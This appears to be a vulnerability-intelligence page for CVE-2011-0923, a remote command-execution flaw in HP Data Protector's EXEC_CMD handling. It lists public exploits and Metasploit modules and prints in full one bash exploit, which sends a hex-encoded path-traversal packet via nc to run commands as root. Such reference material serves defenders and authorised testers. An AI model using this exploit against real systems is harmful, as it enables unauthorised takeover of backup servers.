VIR Vulnerability Intelligence Relay

CVE-2011-0923

critical
Published 2011-02-09 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

The client in HP Data Protector does not properly validate EXEC_CMD arguments, which allows remote attackers to execute arbitrary Perl code via a crafted command, related to the "local bin directory."

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-17614 remote hp-ux bash ยท 2 KB
Adrian Puente Z. ยท 2011-08-05

HP Data Protector (HP-UX) - Remote Shell

bash exploit Source: Exploit-DB 
#!/bin/bash 
# Exploit Title: HP Data Protector Remote Shell for HPUX
# Date: 2011-08-02
# Author: Adrian Puente Z.
# Software Link:http://www8.hp.com/us/en/software/software-
# product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HPUX
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/ 
# Document.jsp?objectID=c02781143
#
# Powered by Hackarandas www.hackarandas.com 
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks 
# Lots of thanks to David Llorens (@c4an) for all the help. 
# Ported to HPUX from fdisk's (@fdiskyou) Windows version. 
# Windows version: http://www.exploit-db.com/exploits/17339/ 
#
# 
# Shouts to shellhellboy, r3x, r0d00m, etlow,  
# psymera, nitr0us and ppl in #mendozaaaa 
# 
#

[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` <host> <port> <commands>\n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)
" && exit 0

HOST=`echo ${@} | awk '{print $1}'`
PORT=`echo ${@} | awk '{print $2}'`
CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'`
SC=""
SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"
SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SHELLCODE=${SC}
( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}
EDB-27400 remote windows
Alessandro Di Pinto & Claudio Moletta ยท 2013-08-07

HP Data Protector - Remote Command Execution

Source code queued for fetch โ€” refresh in a moment.
EDB-18521 remote windows verified
Metasploit ยท 2012-02-25

HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)

Source code queued for fetch โ€” refresh in a moment.
EDB-17339 remote windows verified
fdiskyou ยท 2011-05-28

HP Data Protector Client 6.11 - 'EXEC_CMD' Remote Code Execution

Source code queued for fetch โ€” refresh in a moment.
EDB-17648 remote linux
SZ ยท 2011-08-10

HP Data Protector (Linux) - Remote Command Execution

Source code queued for fetch โ€” refresh in a moment.

Metasploit modules

auxiliary_admin/hp/hp_data_protector_cmd rank 300
HP Data Protector 6.1 EXEC_CMD Command Execution
Source fetch failed: fetch_error โ€” view the original via the link above.
exploit_linux/misc/hp_data_protector_cmd_exec rank 600
HP Data Protector 6 EXEC_CMD Remote Code Execution
Source fetch failed: fetch_error โ€” view the original via the link above.

Application impact
VendorProductVersionsFixed
hp hpdata_protector

References

CWEs

CWE-20

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.